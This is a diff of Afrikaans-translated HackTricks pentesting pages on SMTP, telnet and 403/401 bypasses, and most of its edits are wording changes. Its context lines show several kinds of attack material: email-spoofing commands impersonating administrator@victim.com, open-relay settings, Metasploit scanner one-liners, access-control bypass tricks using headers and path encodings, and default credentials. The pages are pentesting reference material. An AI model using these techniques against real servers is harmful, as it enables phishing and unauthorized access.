| ALL | Pas altyd; gebruik vir 'n standaard resultaat soos `-all` vir alle IP's wat nie deur vorige meganismes pas nie. | | ALL | Pas altyd toe; gebruik vir 'n standaard resultaat soos `-all` vir alle IP's wat nie deur vorige meganismes pas nie. |
| A | As die domeinnaam 'n adres rekord (A of AAAA) het wat na die sender se adres opgelos kan word, sal dit pas. | | A | As die domeinnaam 'n adres rekord (A of AAAA) het wat na die sender se adres opgelos kan word, sal dit pas. |
| IP4 | As die sender in 'n gegewe IPv4 adres reeks is, pas. | | IP4 | As die sender in 'n gegewe IPv4 adres reeks is, pas. |
| IP6 | As die sender in 'n gegewe IPv6 adres reeks is, pas. | | IP6 | As die sender in 'n gegewe IPv6 adres reeks is, pas. |
@ -332,7 +332,7 @@ dig 20120113._domainkey.gmail.com TXT | grep p=
DMARC verbeter e-pos sekuriteit deur op SPF en DKIM protokolle te bou. Dit skets beleide wat posbedieners lei in die hantering van e-posse van 'n spesifieke domein, insluitend hoe om met outentikasiefoute om te gaan en waar om verslae oor e-posverwerkingsaksies te stuur. DMARC verbeter e-pos sekuriteit deur op SPF en DKIM protokolle te bou. Dit skets beleide wat posbedieners lei in die hantering van e-posse van 'n spesifieke domein, insluitend hoe om met outentikasiefoute om te gaan en waar om verslae oor e-posverwerkingsaksies te stuur.
**Om die DMARC rekord te verkry, moet jy die subdomein \_dmarc vra** **Om die DMARC rekord te verkry, moet jy die subdomein \_dmarc navraag doen**
```bash ```bash
# Reject # Reject
dig _dmarc.facebook.com txt | grep DMARC dig _dmarc.facebook.com txt | grep DMARC
@ -363,13 +363,13 @@ _dmarc.bing.com. 3600 IN TXT "v=DMARC1; p=none; pct=100; rua=mailto:BingEmailDMA
**Van** [**hier**](https://serverfault.com/questions/322949/do-spf-records-for-primary-domain-apply-to-subdomains)**.**\ **Van** [**hier**](https://serverfault.com/questions/322949/do-spf-records-for-primary-domain-apply-to-subdomains)**.**\
Jy moet aparte SPF-rekords hê vir elke subdomein waarvan jy e-pos wil stuur.\ Jy moet aparte SPF-rekords hê vir elke subdomein waarvan jy e-pos wil stuur.\
Die volgende is oorspronklik op openspf.org gepos, wat voorheen 'n uitstekende hulpbron vir hierdie soort dinge was. Die volgende is oorspronklik op openspf.org gepos, wat vroeër 'n uitstekende hulpbron vir hierdie soort dinge was.
> Die Demon Vraag: Wat van subdomeine? > Die Demon Vraag: Wat van subdomeine?
> >
> As ek e-pos van pielovers.demon.co.uk ontvang, en daar is geen SPF-data vir pielovers nie, moet ek dan een vlak teruggaan en SPF vir demon.co.uk toets? Nee. Elke subdomein by Demon is 'n ander kliënt, en elke kliënt mag hul eie beleid hê. Dit sou nie sin maak dat Demon's beleid op al sy kliënte standaard van toepassing is nie; as Demon dit wil doen, kan dit SPF-rekords vir elke subdomein opstel. > As ek e-pos van pielovers.demon.co.uk ontvang, en daar is geen SPF-data vir pielovers nie, moet ek dan een vlak teruggaan en SPF vir demon.co.uk toets? Nee. Elke subdomein by Demon is 'n ander kliënt, en elke kliënt mag hul eie beleid hê. Dit sou nie sin maak dat Demon's beleid op al sy kliënte standaard van toepassing is nie; as Demon dit wil doen, kan dit SPF-rekords vir elke subdomein opstel.
> >
> So die advies aan SPF-uitgewers is dit: jy moet 'n SPF-rekord vir elke subdomein of gasheernaam wat 'n A of MX-rekord het, byvoeg. > So die advies aan SPF-uitgewers is die volgende: jy moet 'n SPF-rekord vir elke subdomein of gasheernaam wat 'n A of MX-rekord het, byvoeg.
> >
> Webwerwe met wildcard A of MX-rekords moet ook 'n wildcard SPF-rekord hê, van die vorm: \* IN TXT "v=spf1 -all" > Webwerwe met wildcard A of MX-rekords moet ook 'n wildcard SPF-rekord hê, van die vorm: \* IN TXT "v=spf1 -all"
@ -379,7 +379,7 @@ Dit maak sin - 'n subdomein mag baie goed in 'n ander geografiese ligging wees e
Wanneer e-posse gestuur word, is dit van kardinale belang om te verseker dat hulle nie as spam gemerk word nie. Dit word dikwels bereik deur die gebruik van 'n **relay-server wat deur die ontvanger vertrou word**. 'n Algemene uitdaging is egter dat administrateurs dalk nie ten volle bewus is van watter **IP-reekse veilig is om toe te laat** nie. Hierdie gebrek aan begrip kan lei tot foute in die opstelling van die SMTP-server, 'n risiko wat gereeld in sekuriteitsassesseringe geïdentifiseer word. Wanneer e-posse gestuur word, is dit van kardinale belang om te verseker dat hulle nie as spam gemerk word nie. Dit word dikwels bereik deur die gebruik van 'n **relay-server wat deur die ontvanger vertrou word**. 'n Algemene uitdaging is egter dat administrateurs dalk nie ten volle bewus is van watter **IP-reekse veilig is om toe te laat** nie. Hierdie gebrek aan begrip kan lei tot foute in die opstelling van die SMTP-server, 'n risiko wat gereeld in sekuriteitsassesseringe geïdentifiseer word.
'n Oplossing wat sommige administrateurs gebruik om e-posafleweringsprobleme te vermy, veral rakende kommunikasie met potensiële of lopende kliënte, is om **verbindinge van enige IP-adres toe te laat**. Dit word gedoen deur die SMTP-server se `mynetworks` parameter te konfigureer om alle IP-adresse te aanvaar, soos hieronder getoon: 'n Oplossing wat sommige administrateurs gebruik om e-posafleweringsprobleme te vermy, veral rakende kommunikasie met potensiële of lopende kliënte, is om **verbindinge van enige IP-adres toe te laat**. Dit word gedoen deur die SMTP-server se `mynetworks`-parameter te konfigureer om alle IP-adresse te aanvaar, soos hieronder getoon:
```bash ```bash
mynetworks = 0.0.0.0/0 mynetworks = 0.0.0.0/0
``` ```
@ -390,7 +390,7 @@ nmap -p25 --script smtp-open-relay 10.10.10.10 -v
### **Gereedskap** ### **Gereedskap**
* [**https://github.com/serain/mailspoof**](https://github.com/serain/mailspoof) **Kontroleer vir SPF en DMARC miskonfigurasies** * [**https://github.com/serain/mailspoof**](https://github.com/serain/mailspoof) **Kontroleer vir SPF en DMARC miskonfigurasies**
* [**https://pypi.org/project/checkdmarc/**](https://pypi.org/project/checkdmarc/) **Kry SPF en DMARC konfigurasies outomaties** * [**https://pypi.org/project/checkdmarc/**](https://pypi.org/project/checkdmarc/) **Kry outomaties SPF en DMARC konfigurasies**
### Stuur Vals E-pos ### Stuur Vals E-pos
@ -408,7 +408,7 @@ python3 magicspoofmail.py -d victim.com -t -e destination@gmail.com
python3 magicspoofmail.py -d victim.com -t -e destination@gmail.com --subject TEST --sender administrator@victim.com python3 magicspoofmail.py -d victim.com -t -e destination@gmail.com --subject TEST --sender administrator@victim.com
``` ```
{% hint style="warning" %} {% hint style="warning" %}
As jy enige **fout kry met die dkim python lib** om die sleutel te ontleed, voel vry om hierdie een te gebruik.\ As jy enige **fout kry met die dkim python lib** wat die sleutel ontleed, voel vry om hierdie een te gebruik.\
**LET WEL**: Dit is net 'n vuil oplossing om vinnige kontroles te doen in gevalle waar die openssl private sleutel **nie deur dkim ontleed kan word** nie. **LET WEL**: Dit is net 'n vuil oplossing om vinnige kontroles te doen in gevalle waar die openssl private sleutel **nie deur dkim ontleed kan word** nie.
``` ```
-----BEGIN RSA PRIVATE KEY----- -----BEGIN RSA PRIVATE KEY-----
@ -520,7 +520,7 @@ s.sendmail(sender, [destination], msg_data)
### Postfix ### Postfix
Gewoonlik, as geïnstalleer, in `/etc/postfix/master.cf` bevat **scripts om uit te voer** wanneer byvoorbeeld 'n nuwe e-pos deur 'n gebruiker ontvang word. Byvoorbeeld, die lyn `flags=Rq user=mark argv=/etc/postfix/filtering-f ${sender} -- ${recipient}` beteken dat `/etc/postfix/filtering` uitgevoer sal word as 'n nuwe e-pos deur die gebruiker mark ontvang word. Gewoonlik, as dit geïnstalleer is, in `/etc/postfix/master.cf` bevat **scripts om uit te voer** wanneer byvoorbeeld 'n nuwe e-pos deur 'n gebruiker ontvang word. Byvoorbeeld, die lyn `flags=Rq user=mark argv=/etc/postfix/filtering-f ${sender} -- ${recipient}` beteken dat `/etc/postfix/filtering` uitgevoer sal word as 'n nuwe e-pos deur die gebruiker mark ontvang word.
Ander konfigurasie lêers: Ander konfigurasie lêers:
``` ```
@ -583,9 +583,9 @@ Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/smtp/smtp_version; set RHOSTS {IP}; set RPORT 25; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smtp/smtp_ntlm_domain; set RHOSTS {IP}; set RPORT 25; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smtp/smtp_relay; set RHOSTS {IP}; set RPORT 25; run; exit' Command: msfconsole -q -x 'use auxiliary/scanner/smtp/smtp_version; set RHOSTS {IP}; set RPORT 25; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smtp/smtp_ntlm_domain; set RHOSTS {IP}; set RPORT 25; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smtp/smtp_relay; set RHOSTS {IP}; set RPORT 25; run; exit'
``` ```
<figure><img src="../../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure> <figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
**Onmiddellik beskikbare opstelling vir kwesbaarheidsevaluering & penetrasietoetsing**. Voer 'n volledige pentest vanaf enige plek uit met 20+ gereedskap en funksies wat van rekognisie tot verslagdoening strek. Ons vervang nie pentesters nie - ons ontwikkel pasgemaakte gereedskap, opsporing- & eksplorasie-modules om hulle weer 'n bietjie tyd te gee om dieper te delf, shells te pop en pret te hê. **Dadelijk beskikbare opstelling vir kwesbaarheidsevaluering & penetrasietoetsing**. Voer 'n volledige pentest van enige plek af uit met 20+ gereedskap & funksies wat van rekognisie tot verslagdoening strek. Ons vervang nie pentesters nie - ons ontwikkel pasgemaakte gereedskap, opsporing & eksplorasie modules om hulle weer 'n bietjie tyd te gee om dieper te delf, shells te pop en pret te hê.
{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %} {% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}

View file

@ -15,7 +15,7 @@ Leer & oefen GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size=
</details> </details>
{% endhint %} {% endhint %}
<figure><img src="../../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure> <figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
**Onmiddellik beskikbare opstelling vir kwesbaarheidsevaluering & penetrasietoetsing**. Voer 'n volledige pentest van enige plek af uit met 20+ gereedskap & funksies wat van rekognisie tot verslagdoening strek. Ons vervang nie pentesters nie - ons ontwikkel pasgemaakte gereedskap, opsporing & eksploitasiemodules om hulle weer tyd te gee om dieper te delf, shells te pop en pret te hê. **Onmiddellik beskikbare opstelling vir kwesbaarheidsevaluering & penetrasietoetsing**. Voer 'n volledige pentest van enige plek af uit met 20+ gereedskap & funksies wat van rekognisie tot verslagdoening strek. Ons vervang nie pentesters nie - ons ontwikkel pasgemaakte gereedskap, opsporing & eksploitasiemodules om hulle weer tyd te gee om dieper te delf, shells te pop en pret te hê.
@ -33,7 +33,7 @@ Dit is die eerste SMTP-opdrag: dit begin die gesprek deur die sender bediener te
Met hierdie SMTP-opdrag begin die operasies: die sender verklaar die bron e-posadres in die “From” veld en begin werklik die e-pos oordrag. Met hierdie SMTP-opdrag begin die operasies: die sender verklaar die bron e-posadres in die “From” veld en begin werklik die e-pos oordrag.
**RCPT TO**\ **RCPT TO**\
Dit identifiseer die ontvanger van die e-pos; as daar meer as een is, word die opdrag eenvoudig adres vir adres herhaal. Dit identifiseer die ontvanger van die e-pos; as daar meer as een is, word die opdrag eenvoudig herhaal adres vir adres.
**SIZE**\ **SIZE**\
Hierdie SMTP-opdrag informeer die afstandbediener oor die geskatte grootte (in terme van bytes) van die aangehegte e-pos. Dit kan ook gebruik word om die maksimum grootte van 'n boodskap aan te dui wat deur die bediener aanvaar kan word. Hierdie SMTP-opdrag informeer die afstandbediener oor die geskatte grootte (in terme van bytes) van die aangehegte e-pos. Dit kan ook gebruik word om die maksimum grootte van 'n boodskap aan te dui wat deur die bediener aanvaar kan word.
@ -48,10 +48,10 @@ Die bediener word gevra om te verifieer of 'n spesifieke e-posadres of gebruiker
Hierdie opdrag word gebruik om rolle tussen die kliënt en die bediener om te draai, sonder die behoefte om 'n nuwe verbinding te maak. Hierdie opdrag word gebruik om rolle tussen die kliënt en die bediener om te draai, sonder die behoefte om 'n nuwe verbinding te maak.
**AUTH**\ **AUTH**\
Met die AUTH-opdrag, autentiseer die kliënt homself aan die bediener, deur sy gebruikersnaam en wagwoord te gee. Dit is 'n ander laag van sekuriteit om 'n behoorlike oordrag te waarborg. Met die AUTH-opdrag, autentiseer die kliënt homself by die bediener, deur sy gebruikersnaam en wagwoord te gee. Dit is 'n ander laag van sekuriteit om 'n behoorlike oordrag te waarborg.
**RSET**\ **RSET**\
Dit kommunikeer aan die bediener dat die aanhoudende e-pos oordrag beëindig gaan word, alhoewel die SMTP gesprek nie gesluit sal word nie (soos in die geval van QUIT). Dit kommunikeer aan die bediener dat die aanhoudende e-pos oordrag gaan beëindig word, alhoewel die SMTP gesprek nie gesluit sal word nie (soos in die geval van QUIT).
**EXPN**\ **EXPN**\
Hierdie SMTP-opdrag vra om 'n bevestiging oor die identifikasie van 'n poslys. Hierdie SMTP-opdrag vra om 'n bevestiging oor die identifikasie van 'n poslys.
@ -62,7 +62,7 @@ Dit is 'n kliënt se versoek om inligting wat nuttig kan wees vir 'n suksesvolle
**QUIT**\ **QUIT**\
Dit beëindig die SMTP gesprek. Dit beëindig die SMTP gesprek.
<figure><img src="../../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure> <figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
**Onmiddellik beskikbare opstelling vir kwesbaarheidsevaluering & penetrasietoetsing**. Voer 'n volledige pentest van enige plek af uit met 20+ gereedskap & funksies wat van rekognisie tot verslagdoening strek. Ons vervang nie pentesters nie - ons ontwikkel pasgemaakte gereedskap, opsporing & eksploitasiemodules om hulle weer tyd te gee om dieper te delf, shells te pop en pret te hê. **Onmiddellik beskikbare opstelling vir kwesbaarheidsevaluering & penetrasietoetsing**. Voer 'n volledige pentest van enige plek af uit met 20+ gereedskap & funksies wat van rekognisie tot verslagdoening strek. Ons vervang nie pentesters nie - ons ontwikkel pasgemaakte gereedskap, opsporing & eksploitasiemodules om hulle weer tyd te gee om dieper te delf, shells te pop en pret te hê.

View file

@ -6,18 +6,18 @@ Leer & oefen GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size=
<details> <details>
<summary>Ondersteun HackTricks</summary> <summary>Support HackTricks</summary>
* Kyk na die [**subskripsieplanne**](https://github.com/sponsors/carlospolop)! * Kyk na die [**subskripsie planne**](https://github.com/sponsors/carlospolop)!
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** * **Sluit aan by die** 💬 [**Discord groep**](https://discord.gg/hRep4RUj7f) of die [**telegram groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Deel hacking truuks deur PRs in te dien na die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. * **Deel hacking truuks deur PRs in te dien na die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details> </details>
{% endhint %} {% endhint %}
<figure><img src="/.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure> <figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
**Onmiddellik beskikbare opstelling vir kwesbaarheidsassessering & penetrasietoetsing**. Voer 'n volledige pentest vanaf enige plek uit met 20+ gereedskap & funksies wat van rekognisie tot verslagdoening gaan. Ons vervang nie pentesters nie - ons ontwikkel pasgemaakte gereedskap, opsporing & eksploitasiemodules om hulle weer 'n bietjie tyd te gee om dieper te delf, shells te pop, en pret te hê. **Onmiddellik beskikbare opstelling vir kwesbaarheidsassessering & penetrasietoetsing**. Voer 'n volledige pentest vanaf enige plek uit met 20+ gereedskap & funksies wat van rekognisie tot verslagdoening strek. Ons vervang nie pentesters nie - ons ontwikkel pasgemaakte gereedskap, opsporing & eksploitasiemodules om hulle weer 'n bietjie tyd te gee om dieper te delf, shells te pop en pret te hê.
{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %} {% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
@ -85,9 +85,9 @@ Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_version; set RHOSTS {IP}; set RPORT 23; run; exit' && msfconsole -q -x 'use auxiliary/scanner/telnet/brocade_enable_login; set RHOSTS {IP}; set RPORT 23; run; exit' && msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_encrypt_overflow; set RHOSTS {IP}; set RPORT 23; run; exit' && msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_ruggedcom; set RHOSTS {IP}; set RPORT 23; run; exit' Command: msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_version; set RHOSTS {IP}; set RPORT 23; run; exit' && msfconsole -q -x 'use auxiliary/scanner/telnet/brocade_enable_login; set RHOSTS {IP}; set RPORT 23; run; exit' && msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_encrypt_overflow; set RHOSTS {IP}; set RPORT 23; run; exit' && msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_ruggedcom; set RHOSTS {IP}; set RPORT 23; run; exit'
``` ```
<figure><img src="/.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure> <figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
**Onmiddellik beskikbare opstelling vir kwesbaarheidsevaluering & penetrasietoetsing**. Voer 'n volledige pentest vanaf enige plek uit met 20+ gereedskap en funksies wat van rekognisie tot verslagdoening gaan. Ons vervang nie pentesters nie - ons ontwikkel pasgemaakte gereedskap, opsporing- & eksploitasiemodules om hulle weer 'n bietjie tyd te gee om dieper te delf, shells te pop, en pret te hê. **Onmiddellik beskikbare opstelling vir kwesbaarheidsevaluering & penetrasietoetsing**. Voer 'n volledige pentest vanaf enige plek uit met 20+ gereedskap en funksies wat van rekognisie tot verslagdoening strek. Ons vervang nie pentesters nie - ons ontwikkel pasgemaakte gereedskap, opsporing- & eksploitasiemodules om hulle weer 'n bietjie tyd te gee om dieper te delf, shells te pop, en pret te hê.
{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %} {% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}

View file

@ -15,9 +15,9 @@ Leer & oefen GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size=
</details> </details>
{% endhint %} {% endhint %}
<figure><img src="../../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure> <figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
**Onmiddellik beskikbare opstelling vir kwesbaarheidsevaluering & penetrasietoetsing**. Voer 'n volledige pentest van enige plek af uit met 20+ gereedskap & funksies wat van rekognisie tot verslagdoening gaan. Ons vervang nie pentesters nie - ons ontwikkel pasgemaakte gereedskap, opsporing & eksploitasiemodules om hulle terug 'n bietjie tyd te gee om dieper te delf, shells te pop en pret te hê. **Onmiddellik beskikbare opstelling vir kwesbaarheid assessering & penetrasietoetsing**. Voer 'n volledige pentest van enige plek af uit met 20+ gereedskap & funksies wat van rekognisie tot verslagdoening gaan. Ons vervang nie pentesters nie - ons ontwikkel pasgemaakte gereedskap, opsporing & eksploitasiemodules om hulle terug 'n bietjie tyd te gee om dieper te delf, shells te pop en pret te hê.
{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %} {% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
@ -26,14 +26,14 @@ Leer & oefen GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size=
Probeer om **verskillende werkwoorde** te gebruik om die lêer te bekom: `GET, HEAD, POST, PUT, DELETE, CONNECT, OPTIONS, TRACE, PATCH, INVENTED, HACK` Probeer om **verskillende werkwoorde** te gebruik om die lêer te bekom: `GET, HEAD, POST, PUT, DELETE, CONNECT, OPTIONS, TRACE, PATCH, INVENTED, HACK`
* Kyk na die responskoppe, miskien kan sommige inligting gegee word. Byvoorbeeld, 'n **200 respons** op **HEAD** met `Content-Length: 55` beteken dat die **HEAD werkwoord toegang tot die info kan verkry**. Maar jy moet steeds 'n manier vind om daardie info te exfiltreer. * Kyk na die responskoppe, miskien kan sommige inligting gegee word. Byvoorbeeld, 'n **200 respons** op **HEAD** met `Content-Length: 55` beteken dat die **HEAD werkwoord toegang tot die info kan verkry**. Maar jy moet steeds 'n manier vind om daardie info te exfiltreer.
* Gebruik 'n HTTP-kop soos `X-HTTP-Method-Override: PUT` om die werkwoord wat gebruik word te oorskry. * Gebruik 'n HTTP-kop soos `X-HTTP-Method-Override: PUT` om die gebruikte werkwoord te oorskryf.
* Gebruik **`TRACE`** werkwoord en as jy baie gelukkig is, kan jy dalk in die respons ook die **koppe wat deur tussenliggende proxies bygevoeg is** sien wat nuttig kan wees. * Gebruik **`TRACE`** werkwoord en as jy baie gelukkig is, kan jy dalk in die respons ook die **koppe wat deur tussenliggende proxies bygevoeg is** sien wat nuttig kan wees.
## HTTP Headers Fuzzing ## HTTP Headers Fuzzing
* **Verander die Host-kop** na 'n arbitrêre waarde ([dit het hier gewerk](https://medium.com/@sechunter/exploiting-admin-panel-like-a-boss-fc2dd2499d31)) * **Verander die Host-kop** na 'n arbitrêre waarde ([dit het hier gewerk](https://medium.com/@sechunter/exploiting-admin-panel-like-a-boss-fc2dd2499d31))
* Probeer om [**ander User Agents te gebruik**](https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/User-Agents/UserAgents.fuzz.txt) om toegang tot die hulpbron te verkry. * Probeer om [**ander User Agents te gebruik**](https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/User-Agents/UserAgents.fuzz.txt) om toegang tot die hulpbron te verkry.
* **Fuzz HTTP Koppe**: Probeer om HTTP Proxy **Koppe**, HTTP Verifikasie Basies en NTLM brute-force (met 'n paar kombinasies net) en ander tegnieke te gebruik. Om dit alles te doen, het ek die gereedskap [**fuzzhttpbypass**](https://github.com/carlospolop/fuzzhttpbypass) geskep. * **Fuzz HTTP Koppe**: Probeer om HTTP Proxy **Koppe**, HTTP Authentisering Basic en NTLM brute-force (met 'n paar kombinasies net) en ander tegnieke te gebruik. Om dit alles te doen, het ek die gereedskap [**fuzzhttpbypass**](https://github.com/carlospolop/fuzzhttpbypass) geskep.
* `X-Originating-IP: 127.0.0.1` * `X-Originating-IP: 127.0.0.1`
* `X-Forwarded-For: 127.0.0.1` * `X-Forwarded-For: 127.0.0.1`
@ -53,7 +53,7 @@ As die **pad beskerm is**, kan jy probeer om die padbeskerming te omseil deur hi
* `X-Original-URL: /admin/console` * `X-Original-URL: /admin/console`
* `X-Rewrite-URL: /admin/console` * `X-Rewrite-URL: /admin/console`
* As die bladsy **agter 'n proxy is**, is dit dalk die proxy wat jou verhinder om toegang tot die private inligting te verkry. Probeer om [**HTTP Request Smuggling**](../../pentesting-web/http-request-smuggling/) **of** [**hop-by-hop koppe**](../../pentesting-web/abusing-hop-by-hop-headers.md)** te misbruik.** * As die bladsy **agter 'n proxy is**, miskien is dit die proxy wat jou verhinder om toegang tot die private inligting te verkry. Probeer om [**HTTP Request Smuggling**](../../pentesting-web/http-request-smuggling/) **of** [**hop-by-hop koppe**](../../pentesting-web/abusing-hop-by-hop-headers.md)** te misbruik.**
* Fuzz [**spesiale HTTP koppe**](special-http-headers.md) op soek na verskillende respons. * Fuzz [**spesiale HTTP koppe**](special-http-headers.md) op soek na verskillende respons.
* **Fuzz spesiale HTTP koppe** terwyl jy **HTTP Metodes** fuzz. * **Fuzz spesiale HTTP koppe** terwyl jy **HTTP Metodes** fuzz.
* **Verwyder die Host-kop** en miskien sal jy in staat wees om die beskerming te omseil. * **Verwyder die Host-kop** en miskien sal jy in staat wees om die beskerming te omseil.
@ -63,7 +63,7 @@ As die **pad beskerm is**, kan jy probeer om die padbeskerming te omseil deur hi
As _/pad_ geblokkeer is: As _/pad_ geblokkeer is:
* Probeer om _**/**_**%2e/pad \_(as die toegang deur 'n proxy geblokkeer word, kan dit die beskerming omseil). Probeer ook**\_\*\* /%252e\*\*/pad (dubbele URL-kodering) * Probeer om _**/**_**%2e/pad \_(as die toegang deur 'n proxy geblokkeer word, kan dit die beskerming omseil). Probeer ook**\_\*\* /%252e\*\*/pad (dubbele URL-kodering)
* Probeer **Unicode omseiling**: _/**%ef%bc%8f**pad_ (Die URL-gecodeerde karakters is soos "/") so wanneer dit weer geëncodeer word, sal dit _//pad_ wees en miskien het jy reeds die _/pad_ naamkontrole omseil * Probeer **Unicode omseiling**: _/**%ef%bc%8f**pad_ (Die URL-gecodeerde karakters is soos "/") so wanneer dit weer geënkodeer word, sal dit _//pad_ wees en miskien het jy reeds die _/pad_ naamkontrole omseil
* **Ander pad omseilings**: * **Ander pad omseilings**:
* site.com/secret > HTTP 403 Verbode * site.com/secret > HTTP 403 Verbode
* site.com/SECRET > HTTP 200 OK * site.com/SECRET > HTTP 200 OK
@ -100,19 +100,19 @@ As _/pad_ geblokkeer is:
## **Protokol weergawe** ## **Protokol weergawe**
As jy HTTP/1.1 gebruik, **probeer om 1.0 te gebruik** of toets of dit **2.0 ondersteun**. As jy HTTP/1.1 gebruik, **probeer om 1.0 te gebruik** of selfs toets of dit **2.0 ondersteun**.
## **Ander Omseilings** ## **Ander Omseilings**
* Kry die **IP** of **CNAME** van die domein en probeer **dit direk kontak**. * Kry die **IP** of **CNAME** van die domein en probeer **dit direk kontak**.
* Probeer om die **bediener te stres** deur algemene GET versoeke te stuur ([Dit het vir hierdie ou met Facebook gewerk](https://medium.com/@amineaboud/story-of-a-weird-vulnerability-i-found-on-facebook-fc0875eb5125)). * Probeer om die **bediener te stres** deur algemene GET versoeke te stuur ([Dit het vir hierdie ou gewerk met Facebook](https://medium.com/@amineaboud/story-of-a-weird-vulnerability-i-found-on-facebook-fc0875eb5125)).
* **Verander die protokol**: van http na https, of van https na http * **Verander die protokol**: van http na https, of van https na http
* Gaan na [**https://archive.org/web/**](https://archive.org/web/) en kyk of daardie lêer in die verlede **wêreldwyd toeganklik** was. * Gaan na [**https://archive.org/web/**](https://archive.org/web/) en kyk of daardie lêer in die verlede **wêreldwyd toeganklik** was.
## **Brute Force** ## **Brute Force**
* **Raai die wagwoord**: Toets die volgende algemene akrediteer. Weet jy iets van die slagoffer? Of die CTF-uitdaging se naam? * **Raai die wagwoord**: Toets die volgende algemene akrediteer. Weet jy iets van die slagoffer? Of die CTF-uitdaging naam?
* [**Brute force**](../../generic-methodologies-and-resources/brute-force.md#http-brute)**:** Probeer basiese, digest en NTLM verifikasie. * [**Brute force**](../../generic-methodologies-and-resources/brute-force.md#http-brute)**:** Probeer basiese, digest en NTLM auth.
{% code title="Algemene krediete" %} {% code title="Algemene krediete" %}
``` ```
@ -136,7 +136,7 @@ guest guest
* [Verbode Buster](https://github.com/Sn1r/Forbidden-Buster) * [Verbode Buster](https://github.com/Sn1r/Forbidden-Buster)
* [GeenMeerVerbode](https://github.com/akinerk/NoMoreForbidden) * [GeenMeerVerbode](https://github.com/akinerk/NoMoreForbidden)
<figure><img src="../../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure> <figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
**Onmiddellik beskikbare opstelling vir kwesbaarheidsevaluering & penetrasietoetsing**. Voer 'n volledige pentest van enige plek af uit met 20+ gereedskap & funksies wat van rekognisie tot verslagdoening gaan. Ons vervang nie pentesters nie - ons ontwikkel pasgemaakte gereedskap, opsporing & eksplorasie modules om hulle weer 'n bietjie tyd te gee om dieper te delf, shells te pop, en pret te hê. **Onmiddellik beskikbare opstelling vir kwesbaarheidsevaluering & penetrasietoetsing**. Voer 'n volledige pentest van enige plek af uit met 20+ gereedskap & funksies wat van rekognisie tot verslagdoening gaan. Ons vervang nie pentesters nie - ons ontwikkel pasgemaakte gereedskap, opsporing & eksplorasie modules om hulle weer 'n bietjie tyd te gee om dieper te delf, shells te pop, en pret te hê.

View file

@ -15,9 +15,9 @@ Leer & oefen GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size=
</details> </details>
{% endhint %} {% endhint %}
<figure><img src="../../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure> <figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
